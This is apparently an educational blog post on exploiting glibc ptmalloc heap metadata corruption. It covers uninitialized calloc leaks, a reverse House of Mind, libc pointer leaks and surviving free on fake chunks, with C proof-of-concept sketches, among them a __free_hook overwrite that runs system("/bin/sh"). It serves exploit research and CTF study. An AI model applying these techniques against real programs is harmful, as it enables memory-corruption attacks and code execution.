scraps of notes on ptmalloc metadata corruptions

Welcome to the third episode of the ptmalloc fanzine. This will be a shorter one, a collection of notes concerning the exploitation of heap corruptions in a ptmalloc/Linux environment that don’t warrant their own episode.

TLDR

We touch on the following subjects:

- forcing calloc to return uninitialized memory
- a reverse variant of the House of Mind
- heap tricks from the HITCON 2016 qualifier
- conjuring addresses for leaks
- corruption targets in libc
- surviving free on controlled data

As usual, glibc source links and platform-dependent information all pertain to Ubuntu 16.04 on x86-64, unless stated otherwise.

Forcing calloc to return uninitialized memory

There’s a special case in calloc for when _int_malloc returns an mmapped chunk. Mmapped chunks are assumed to be zeroed, so memsetting them isn’t needed. However, _int_malloc ignores the IS_MMAPPED bit, so setting it via corruption on a chunk already in the freelist, then requesting that size from calloc, won’t cause problems: calloc will skip the memset and return uninitialized data. This might be useful for leaking addresses or other sensitive information, and for easing the exploitation of some use-after-free bugs. The victim chunk can be in the fastbins, smallbins or the unsorted bin, but the rounded request size has to be an exact match for the size of the victim chunk. Otherwise, the malloc code will set the size of the returned chunk explicitly, clearing the IS_MMAPPED bit as a side-effect. Running the uninitialized_calloc.c example shows this in action:

tukan@farm:/ptmalloc-fanzine/03-scraps$ ./uninitialized_calloc
allocated victim chunk with requested size 0x100, victim->size == 0x111
allocated another chunk to prevent victim from being coalesced into top
freeing victim chunk
emulating corruption of the IS_MMAPPED bit of victim->size
making a calloc request for an exact size match
the first 2 qwords of the returned region:
0x7ffff7dd1c78 0x7ffff7dd1c78
tukan@farm:/ptmalloc-fanzine/03-scraps$ 
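
For reference, a minimal emulation of the corruption could look like the sketch below. This is not the original uninitialized_calloc.c; it assumes a pre-tcache glibc such as the 2.23 shipped with Ubuntu 16.04, where IS_MMAPPED is 0x2:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(void)
{
    /* requested size 0x100 -> chunk size 0x110, above the fastbin range */
    size_t *victim = malloc(0x100);
    printf("victim->size == %#zx\n", victim[-1]);
    /* keep victim from being coalesced into top on free */
    void *guard = malloc(0x100);
    /* victim ends up alone in the unsorted bin, fd/bk pointing into main_arena */
    free(victim);
    /* emulate the corruption: set IS_MMAPPED in the size field */
    victim[-1] |= 2;
    /* exact size match: _int_malloc returns victim without rewriting its size
       field, and calloc skips the memset because IS_MMAPPED is set */
    uint64_t *leak = calloc(1, 0x100);
    printf("%#lx %#lx\n", (unsigned long) leak[0], (unsigned long) leak[1]);
    (void) guard;
    return 0;
}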

Reverse House of Mind

The House of Mind starts by growing the brk heap above a heap size boundary, so that setting the NON_MAIN_ARENA bit of a chunk will result in free looking for the corresponding arena in attacker-controlled data. The NON_MAIN_ARENA bit can also be of interest the other way around: clearing it for a chunk in an mmapped heap before freeing it makes free enter the chunk into the freelists of the main arena, making it possible to have mallocs from the main arena return chunks in other arenas. This may be useful in situations where, for example, worker threads have vulnerable buffers but no worthwhile targets on their heaps, while the main thread allocates and deallocates interesting objects. The reverse_mind.c example shows this:

tukan@farm:/ptmalloc-fanzine/03-scraps$ ./reverse_mind
brk heap is around: 0x55e1915bd010
allocated victim chunk in thread arena with requested size 0x40, victim->size == 0x55
emulating corruption of the NON_MAIN_ARENA bit of victim->size
freeing victim chunk, entering it into a fastbin of the main arena
making a malloc request in the main thread
the address of the chunk returned in the main thread: 0x7fab500008c0
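
A sketch of how such a PoC might be put together follows; this is not the original reverse_mind.c, it again assumes glibc 2.23, and it needs to be built with -pthread:

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

static size_t *victim;

static void *worker(void *arg)
{
    /* served from a freshly mmapped thread arena */
    victim = malloc(0x40);
    /* keep an allocated chunk after victim so the next-size sanity
       checks in _int_free pass */
    malloc(0x40);
    printf("victim->size == %#zx\n", victim[-1]);
    /* emulate the corruption: clear NON_MAIN_ARENA (0x4) */
    victim[-1] &= ~(size_t) 4;
    /* arena_for_chunk() now resolves to the main arena, so this links
       victim into one of its fastbins */
    free(victim);
    return NULL;
}

int main(void)
{
    /* initialize the main arena on the brk heap first */
    printf("brk heap is around: %p\n", malloc(0x10));

    pthread_t t;
    pthread_create(&t, NULL, worker, NULL);
    pthread_join(&t, NULL);

    /* the main thread's request is served from the main arena fastbins,
       returning the thread arena chunk */
    printf("chunk returned in the main thread: %p\n", malloc(0x40));
    return 0;
}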

However, this will only work for fastbin-sized chunks. Others will fail the arena boundary checks on the next chunk, since mmapped heaps end up way higher in the address space than the brk heap. While this could be circumvented by spraying the address space with large mappings so that an mmapped heap ends up below the brk heap, it doesn’t really seem to be worth the trouble.

HITCON 2016 qualifier

This year’s HITCON qual had some really nice heap exploitation challenges; here’s a very short synopsis of the tricks required for some of them:

Conjuring addresses for leaks

Free chunks may contain different addresses in their fd and bk members, depending on their size and position in the freelist, which makes them appealing targets for leaks.
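
For example, on glibc 2.23, a chunk that sits alone in the unsorted bin has both its fd and bk pointing at the bin header inside main_arena, i.e. into libc’s data segment, so a use-after-free read is enough for a libc leak (a minimal sketch):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    size_t *p = malloc(0x100);   /* too big for the fastbins */
    malloc(0x10);                /* keep it from merging into top */
    free(p);                     /* p goes to the unsorted bin */
    /* fd and bk now hold the address of the unsorted bin header in main_arena */
    printf("fd: %#zx bk: %#zx\n", p[0], p[1]);
    return 0;
}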


Corruption targets in libc

Libc has a lot of interesting targets for corruption.
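
Well-known examples on glibc 2.23 include the __malloc_hook/__free_hook/__realloc_hook function pointers, which the corresponding entry points call unconditionally when non-NULL, and the vtable pointers of the _IO_FILE structures used by stdio. A minimal sketch of the hook case, emulating the attacker’s write with a plain assignment:

#include <malloc.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *p = malloc(0x20);
    strcpy(p, "/bin/sh");
    /* emulate an arbitrary write into libc's writable data segment;
       __free_hook is deprecated but still present in glibc 2.23 */
    __free_hook = (void (*)(void *, const void *)) system;
    /* free(p) now ends up running system("/bin/sh") */
    free(p);
    return 0;
}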

Surviving free on controlled data

There are cases when you’ve already done all the necessary corruptions but there are still a couple of free calls, possibly on corrupted chunks, before control flow is hijacked. Setting up a region on which free will operate without crashing isn’t a really difficult task: one way is to set the IS_MMAPPED bit of the chunk, since free passes such chunks to munmap_chunk, which only performs a page-alignment check:

/* from munmap_chunk() in glibc 2.23, malloc/malloc.c; size is chunksize (p) */
uintptr_t block = (uintptr_t) p - p->prev_size;
size_t total_size = p->prev_size + size;

if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
  {
    malloc_printerr (check_action, "munmap_chunk(): invalid pointer", chunk2mem (p), NULL);
    return;
  }

The only thing needed is the offset of our chunk into its page: the prev_size field can then be used to point block outside the mapped ranges while keeping it page-aligned, and the size field to make the total_size value small. Since the return value of munmap isn’t checked, we’re good to go.
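
As a sketch (again glibc 2.23; it assumes the chunk lies above address 0x2000 and that nothing is mapped at 0x1000, which holds under the usual mmap_min_addr), a fake header that survives the free could be set up like this:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(void)
{
    /* stand-in for a chunk whose header we can corrupt */
    size_t *mem = malloc(0x100);
    uintptr_t chunk = (uintptr_t) mem - 2 * sizeof(size_t);

    /* block = chunk - prev_size = 0x1000: page-aligned and unmapped */
    mem[-2] = chunk - 0x1000;
    /* chosen so that prev_size + size wraps around to exactly 0x1000;
       IS_MMAPPED (0x2) sends free down the munmap_chunk path */
    mem[-1] = (0x2000 - chunk) | 2;

    /* munmap(0x1000, 0x1000) unmaps nothing, and its return value
       isn't checked anyway */
    free(mem);
    puts("survived the free");
    return 0;
}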

Closing words

That’s about it, hope you found this educational. As usual, comments of any nature are welcome; hit me up on freenode or twitter.

Special thanks to gym again for the rigorous proofreading.